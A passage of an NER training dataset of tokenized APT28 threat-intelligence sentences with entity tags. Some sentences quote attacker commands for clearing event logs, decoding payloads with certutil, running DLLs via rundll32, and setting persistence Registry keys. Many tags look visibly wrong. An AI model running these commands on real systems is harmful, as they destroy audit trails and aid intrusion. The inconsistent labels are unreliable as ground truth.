- "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "used", - "a", - "publicly", - "available", - "tool", - "to", - "gather", - "and", - "compress", - "multiple", - "documents", - "on", - "the", - "DCCC", - "and", - "DNC", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "Google", - "Drive", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "deployed", - "a", - "bootkit", - "along", - "with", - "Downdelph", - "to", - "ensure", - "its", - "persistence", - "on", - "the", - "victim.", - "The", - "bootkit", - "shares", - "code", - "with", - "some", - "variants", - "of", - "BlackEnergy." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT28", - "can", - "perform", - "brute", - "force", - "attacks", - "to", - "obtain", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "cleared", - "event", - "logs,", - "including", - "by", - "using", - "the", - "commands", - "<code>wevtutil", - "cl", - "System</code>", - "and", - "<code>wevtutil", - "cl", - "Security</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "compromised", - "Office", - "365", - "service", - "accounts", - "with", - "Global", - "Administrator", - "privileges", - "to", - "collect", - "email", - "from", - "user", - "inboxes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "uses", - "a", - "tool", - "that", - "captures", - "information", - "from", - "air-gapped", - "computers", - "via", - "an", - "infected", - "USB", - "and", - "transfers", - "it", - "to", - "network-connected", - "computer", - "when", - "the", - "USB", - "is", - "inserted." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "COM", - "hijacking", - "for", - "persistence", - "by", - "replacing", - "the", - "legitimate", - "<code>MMDeviceEnumerator</code>", - "object", - "with", - "a", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "harvested", - "user's", - "login", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "split", - "archived", - "exfiltration", - "files", - "into", - "chunks", - "smaller", - "than", - "1MB." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "collected", - "files", - "from", - "various", - "information", - "repositories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "retrieved", - "internal", - "documents", - "from", - "machines", - "inside", - "victim", - "environments,", - "including", - "by", - "using", - "Forfiles", - "to", - "stage", - "documents", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "collected", - "files", - "from", - "network", - "shared", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT28", - "backdoor", - "may", - "collect", - "the", - "entire", - "contents", - "of", - "an", - "inserted", - "USB", - "device." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-SecTeam", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT28", - "macro", - "uses", - "the", - "command", - "<code>certutil", - "-decode</code>", - "to", - "decode", - "contents", - "of", - "a", - ".txt", - "file", - "storing", - "the", - "base64", - "encoded", - "payload." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "registered", - "domains", - "imitating", - "NATO,", - "OSCE", - "security", - "websites,", - "Caucasus", - "information", - "resources,", - "and", - "other", - "organizations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "compromised", - "targets", - "via", - "strategic", - "web", - "compromise", - "utilizing", - "custom", - "exploit", - "kits.", - "APT28", - "used", - "reflected", - "cross-site", - "scripting", - "(XSS)", - "against", - "government", - "websites", - "to", - "redirect", - "users", - "to", - "phishing", - "webpages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "delivered", - "JHUHUGIT", - "and", - "Koadic", - "by", - "executing", - "PowerShell", - "commands", - "through", - "DDE", - "in", - "Word", - "documents." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "compromised", - "email", - "accounts", - "to", - "send", - "credential", - "phishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "encrypted", - "a", - ".dll", - "payload", - "using", - "RTL", - "and", - "a", - "custom", - "encryption", - "algorithm.", - "APT28", - "has", - "also", - "obfuscated", - "payloads", - "with", - "base64,", - "XOR,", - "and", - "RC4." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "exfiltrated", - "archives", - "of", - "collected", - "data", - "previously", - "staged", - "on", - "a", - "target's", - "OWA", - "server", - "via", - "HTTPS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT28", - "can", - "exfiltrate", - "data", - "over", - "Google", - "Drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "variety", - "of", - "public", - "exploits,", - "including", - "CVE", - "2020-0688", - "and", - "CVE", - "2020-17144,", - "to", - "gain", - "execution", - "on", - "vulnerable", - "Microsoft", - "Exchange;", - "they", - "have", - "also", - "conducted", - "SQL", - "injection", - "attacks", - "against", - "external", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "exploited", - "Microsoft", - "Office", - "vulnerability", - "CVE-2017-0262", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Exp", - "I-Exp", - "I-Exp", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "CVE-2015-4902", - "to", - "bypass", - "security", - "features." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "exploited", - "CVE-2014-4076,", - "CVE-2015-2387,", - "CVE-2015-1701,", - "CVE-2017-0263", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "exploited", - "a", - "Windows", - "SMB", - "Remote", - "Code", - "Execution", - "Vulnerability", - "to", - "conduct", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Features", - "I-Exp", - "I-Exp", - "I-Exp", - "I-Exp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "used", - "other", - "victims", - "as", - "proxies", - "to", - "relay", - "command", - "traffic,", - "for", - "instance", - "using", - "a", - "compromised", - "Georgian", - "military", - "email", - "server", - "as", - "a", - "hop", - "point", - "to", - "NATO", - "victims.", - "The", - "group", - "has", - "also", - "used", - "a", - "tool", - "that", - "acts", - "as", - "a", - "proxy", - "to", - "allow", - "C2", - "even", - "if", - "the", - "victim", - "is", - "behind", - "a", - "router.", - "APT28", - "has", - "also", - "used", - "a", - "machine", - "to", - "relay", - "and", - "obscure", - "communications", - "between", - "CHOPSTICK", - "and", - "their", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "Tor", - "and", - "a", - "variety", - "of", - "commercial", - "VPN", - "services", - "to", - "route", - "brute", - "force", - "authentication", - "attempts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "intentionally", - "deleted", - "computer", - "files", - "to", - "cover", - "their", - "tracks,", - "including", - "with", - "use", - "of", - "the", - "program", - "CCleaner." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "Forfiles", - "to", - "locate", - "PDF,", - "Excel,", - "and", - "Word", - "documents", - "during", - "collection.", - "The", - "group", - "also", - "searched", - "a", - "compromised", - "DCCC", - "computer", - "for", - "specific", - "terms." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "saved", - "files", - "with", - "hidden", - "file", - "attributes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "the", - "WindowStyle", - "parameter", - "to", - "conceal", - "PowerShell", - "windows." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "downloaded", - "additional", - "files,", - "including", - "by", - "using", - "a", - "first-stage", - "downloader", - "to", - "contact", - "the", - "C2", - "server", - "to", - "obtain", - "the", - "second-stage", - "implant." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "added", - "\"junk", - "data\"", - "to", - "each", - "encoded", - "string,", - "preventing", - "trivial", - "decoding", - "without", - "knowledge", - "of", - "the", - "junk", - "removal", - "algorithm.", - "Each", - "implant", - "was", - "given", - "a", - "\"junk", - "length\"", - "value", - "when", - "created,", - "tracked", - "by", - "the", - "controller", - "software", - "to", - "allow", - "seamless", - "communication", - "but", - "prevent", - "analysis", - "of", - "the", - "command", - "protocol", - "on", - "the", - "wire." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "tools", - "to", - "perform", - "keylogging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "regularly", - "deploys", - "both", - "publicly", - "available", - "(ex:", - "Mimikatz)", - "and", - "custom", - "password", - "retrieval", - "tools", - "on", - "victims.", - "They", - "have", - "also", - "dumped", - "the", - "LSASS", - "process", - "memory", - "using", - "the", - "MiniDump", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "stored", - "captured", - "credential", - "information", - "in", - "a", - "file", - "named", - "pi.log." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "An", - "APT28", - "loader", - "Trojan", - "adds", - "the", - "Registry", - "key", - "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "IMAP,", - "POP3,", - "and", - "SMTP", - "for", - "a", - "communication", - "channel", - "in", - "various", - "implants,", - "including", - "using", - "self-registered", - "Google", - "Mail", - "accounts", - "and", - "later", - "compromised", - "email", - "servers", - "of", - "its", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "attempted", - "to", - "get", - "users", - "to", - "click", - "on", - "Microsoft", - "Office", - "attachments", - "containing", - "malicious", - "macro", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "tricked", - "unwitting", - "recipients", - "into", - "clicking", - "on", - "malicious", - "hyperlinks", - "within", - "emails", - "crafted", - "to", - "resemble", - "trustworthy", - "senders." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "renamed", - "the", - "WinRAR", - "utility", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "changed", - "extensions", - "on", - "files", - "containing", - "exfiltrated", - "data", - "to", - "make", - "them", - "appear", - "benign,", - "and", - "renamed", - "a", - "web", - "shell", - "instance", - "to", - "appear", - "as", - "a", - "legitimate", - "OWA", - "page." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "routed", - "traffic", - "over", - "Tor", - "and", - "VPN", - "servers", - "to", - "obfuscate", - "their", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "the", - "ntdsutil.exe", - "utility", - "to", - "export", - "the", - "Active", - "Directory", - "database", - "for", - "credential", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "2016,", - "APT28", - "conducted", - "a", - "distributed", - "denial", - "of", - "service", - "(DDoS)", - "attack", - "against", - "the", - "World", - "Anti-Doping", - "Agency." - ], - "ner_tags": [ - "O", - "B-Time", - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "compromised", - "Ubiquiti", - "network", - "devices", - "to", - "act", - "as", - "collection", - "devices", - "for", - "credentials", - "compromised", - "via", - "phishing", - "webpages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "deployed", - "the", - "open", - "source", - "tool", - "Responder", - "to", - "conduct", - "NetBIOS", - "Name", - "Service", - "poisoning,", - "which", - "captured", - "usernames", - "and", - "hashed", - "passwords", - "that", - "allowed", - "access", - "to", - "legitimate", - "credentials.", - "APT28", - "close-access", - "teams", - "have", - "used", - "Wi-Fi", - "pineapples", - "to", - "intercept", - "Wi-Fi", - "signals", - "and", - "user", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "regularly", - "deploys", - "both", - "publicly", - "available", - "(ex:", - "Mimikatz)", - "and", - "custom", - "password", - "retrieval", - "tools", - "on", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "the", - "Office", - "Test", - "persistence", - "mechanism", - "within", - "Microsoft", - "Office", - "by", - "adding", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Office", - "test\\Special\\Perf</code>", - "to", - "execute", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "pass", - "the", - "hash", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "brute-force/password-spray", - "tooling", - "that", - "operated", - "in", - "two", - "modes:", - "in", - "brute-force", - "mode", - "it", - "typically", - "sent", - "over", - "300", - "authentication", - "attempts", - "per", - "hour", - "per", - "targeted", - "account", - "over", - "the", - "course", - "of", - "several", - "hours", - "or", - "days.", - "APT28", - "has", - "also", - "used", - "a", - "Kubernetes", - "cluster", - "to", - "conduct", - "distributed,", - "large-scale", - "password", - "guessing", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "B-OffAct" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "brute-force/password-spray", - "tooling", - "that", - "operated", - "in", - "two", - "modes:", - "in", - "password-spraying", - "mode", - "it", - "conducted", - "approximately", - "four", - "authentication", - "attempts", - "per", - "hour", - "per", - "targeted", - "account", - "over", - "the", - "course", - "of", - "several", - "days", - "or", - "weeks.", - "APT28", - "has", - "also", - "used", - "a", - "Kubernetes", - "cluster", - "to", - "conduct", - "distributed,", - "large-scale", - "password", - "spray", - "attacks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "B-OffAct" - ] - }, - { - "tokens": [ - "APT28", - "uses", - "a", - "module", - "to", - "receive", - "a", - "notification", - "every", - "time", - "a", - "USB", - "mass", - "storage", - "device", - "is", - "inserted", - "into", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "spearphishing", - "to", - "compromise", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "downloads", - "and", - "executes", - "PowerShell", - "scripts", - "and", - "performs", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "APT28", - "loader", - "Trojan", - "will", - "enumerate", - "the", - "victim's", - "processes", - "searching", - "for", - "explorer.exe", - "if", - "its", - "current", - "process", - "does", - "not", - "have", - "necessary", - "permissions." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "deployed", - "malware", - "that", - "has", - "copied", - "itself", - "to", - "the", - "startup", - "directory", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "staged", - "archives", - "of", - "collected", - "data", - "on", - "a", - "target's", - "Outlook", - "Web", - "Access", - "(OWA)", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "collected", - "emails", - "from", - "victim", - "Microsoft", - "Exchange", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "uses", - "a", - "tool", - "to", - "infect", - "connected", - "USB", - "devices", - "and", - "transmit", - "itself", - "to", - "air-gapped", - "computers", - "when", - "the", - "infected", - "USB", - "device", - "is", - "inserted." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "a", - "UEFI", - "(Unified", - "Extensible", - "Firmware", - "Interface)", - "rootkit", - "known", - "as", - "LoJax." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT28", - "executed", - "CHOPSTICK", - "by", - "using", - "rundll32", - "commands", - "such", - "as", - "<code>rundll32.exe", - "“C:\\Windows\\twain_64.dll”</code>.", - "APT28", - "also", - "executed", - "a", - ".dll", - "for", - "a", - "first", - "stage", - "dropper", - "using", - "rundll32.exe.", - "An", - "APT28", - "loader", - "Trojan", - "saved", - "a", - "batch", - "script", - "that", - "uses", - "rundll32", - "to", - "execute", - "a", - "DLL", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "mapped", - "network", - "drives", - "using", - "Net", - "and", - "administrator", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "tools", - "to", - "take", - "screenshots", - "from", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "collected", - "information", - "from", - "Microsoft", - "SharePoint", - "services", - "within", - "target", - "networks." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "sent", - "spearphishing", - "emails", - "containing", - "malicious", - "Microsoft", - "Office", - "and", - "RAR", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT28", - "sent", - "spearphishing", - "emails", - "which", - "used", - "a", - "URL-shortener", - "service", - "to", - "masquerade", - "as", - "a", - "legitimate", - "service", - "and", - "to", - "redirect", - "targets", - "to", - "credential", - "harvesting", - "sites." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "B-Purp", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "conducted", - "credential", - "phishing", - "campaigns", - "with", - "embedded", - "links", - "to", - "attacker-controlled", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT28", - "has", - "used", - "several", - "malicious", - "applications", - "to", - "steal", - "user", - "OAuth", - "access", - "tokens", - "including", - "applications", - "masquerading", - "as", - "\"Google", - "Defender\"", - "\"Google", - "Email", - "Protection,\"", - "and", - "\"Google", - "Scanner\"", - "for", - "Gmail", - "users.", - "They", - "also", - "targeted", - "Yahoo", - "users", - "with", - "applications", - "masquerading", - "as", - "\"Delivery", - "Service\"", - "and", - "\"McAfee", - "Email", - "Protection\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SecTeam", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-SecTeam", - "O" - ] - }, - { - "tokens": [ - "APT28", - "installed", - "a", - "Delphi", - "backdoor", - "that", - "used", - "a", 